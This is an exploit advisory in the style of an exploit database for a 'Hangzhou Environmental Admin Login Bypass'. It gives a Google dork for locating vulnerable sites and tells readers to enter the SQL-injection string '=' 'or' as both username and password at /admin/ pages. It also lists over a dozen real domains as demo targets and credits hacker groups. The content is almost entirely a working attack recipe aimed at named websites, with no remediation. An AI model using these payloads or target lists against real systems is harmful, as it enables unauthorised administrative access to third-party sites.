====================================================== # Exploit Title: Hangzhou Environmental Admin Login Bypass # Google Dork: intext:" Powered By Hangzhou " # Date: 2017-06-19 # Author: iranonymous # Tested on: Win 7, Linux *************************************************** # Then Choose a Target and put this after URL :--> /admin/ --> /admin.php # And fill username and password like the information below : # Username: '=' 'or' # Password: '=' 'or' ====================================================== # Demo : http://www.jsclyf.com/admin/admin.php http://www.mldtfx.com/admin/admin.php http://hrbtybw.com/admin/ http://www.fanqicm.com/admin/ http://www.hstssp.com/admin/ http://www.hzlyscgs.com/admin/ http://www.sphrb.com/admin/ http://www.zsdzgs.org/admin/ http://www.hstssp.com/admin/ http://www.jiushengyiyao.com/admin/ http://www.hrbccdt.com/admin/ http://xcp.webnetseo.net/admin/ http://www.zhuomei777.com/admin/ http://www.dxjpdt.com/admin/ ===================================================== # Thanks to : ~~> MR.Khatar || Blackwolf_Iran ||Ormazd || ll_azab-siyah_ll ||Sh@d0w ||Hellish_PN (mamad khodesh) ||Shdmehr || # Iranian Anonymous # Discovered By: Saman.Khan